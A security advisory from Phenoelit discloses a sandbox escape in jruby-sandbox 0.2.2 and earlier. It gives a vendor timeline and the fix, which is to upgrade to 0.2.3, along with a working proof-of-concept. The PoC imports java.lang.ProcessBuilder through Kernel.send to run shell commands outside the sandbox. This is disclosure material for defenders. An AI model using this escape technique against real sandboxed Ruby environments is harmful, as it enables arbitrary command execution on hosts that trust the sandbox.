: JRuby Sandbox 0.2.2 – Sandbox Escape

[]

Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+++>
     [ Authors ]
 joernchen <joernchen () phenoelit de>
    Phenoelit Group (http://www.phenoelit.de)
     [ Affected Products ]
 jruby-sandbox <= 0.2.2
 https://github.com/omghax/jruby-sandbox
     [ Vendor communication ]
 2014-04-22 Send vulnerability details to project maintainer
 2014-04-24 Requesting confirmation that details were received
 2014-04-24 Maintainer states he is working on a test case
 2014-04-24 Maintainer releases fixed version
 2014-04-24 Release of this advisory
     [ Description ]
 jruby-sandbox aims to allow safe execution of user given Ruby
 code within a JRuby [0] runtime. However via import of Java 
 classes it is possible to circumvent those protections and 
 execute arbitrary code outside the sandboxed environment.
     [ Example ]
     require 'sandbox'
  sand = Sandbox.safe
  sand.activate!
     begin
 sand.eval("print `id`")
  rescue Exception => e
 puts "fail via Ruby ;)"
  end
  puts "Now for some Java"
     sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
  sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
  sand.eval("s = Java::java.util.Scanner.new( " + 
 "Java::java.lang.ProcessBuilder.new('sh','-c','id')" + 
 ".start.getInputStream ).useDelimiter(\"\x00\").next")
  sand.eval("print s")
     [ Solution ]
 Upgrade to version 0.2.3
     [ References ]
 [0] http://jruby.org/
     [ end of file ]

Tweet